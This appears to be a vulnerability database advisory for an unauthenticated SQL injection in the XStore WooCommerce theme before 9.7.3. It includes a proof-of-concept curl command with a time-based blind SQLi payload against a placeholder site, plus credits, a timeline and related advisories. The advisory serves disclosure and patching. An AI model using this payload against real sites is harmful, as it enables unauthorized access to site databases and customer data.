XStore < 9.7.3 – Unauthenticated SQLi | CVE 2026-3326 | Theme Vulnerabilities

Description

The theme does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

Proof of Concept

Have the following installed:
1. Xstore Theme (the vulnerable)
2. Xstore Core Plugin
3. Woocommerce Plugin

then run the following command:

`curl "https://example.com/?s=test%27)%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20(%27hyMm%27=%27hyMm&et_search=true&post_type=product"
`

Observable Result: Response time of ~11 seconds or more.

Affects Themes

Fixed in 9.7.3

References

CVE

URL

https://themeforest.net/item/xstore-responsive-woocommerce-theme/15780546

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Ahmed Makawi

Submitter

Ahmed Makawi

Submitter website

https://www.linkedin.com/in/ahmed-makawi/

Verified

Yes

WPVDB ID

2c5bdb17-8b12-45b5-878b-627056dc8956

Timeline

Publicly Published

2026-05-20 (about 21 days ago)

Added

2026-05-20 (about 20 days ago)

Last Updated

2026-06-09 (about 10 hours ago)

Other

Published

Title

Published

2024-02-27

Title

WP eCommerce <= 3.15.1 - Unauthenticated SQL Injection

Published

2025-01-13

Title

Neon Product Designer <= 2.2.0 - Contributor+ SQL Injection

Published

2026-02-26

Title

WP Attractive Donations System - Easy Stripe & Paypal donations <= 1.25 - Unauthenticated SQL Injection

Published

2024-12-14

Title

Service <= 1.0.4 - Authenticated (Subscriber+) SQL Injection

Published

2024-07-29

Title

SmartSearch WP <= 2.4.4 - Unauthenticated SQLi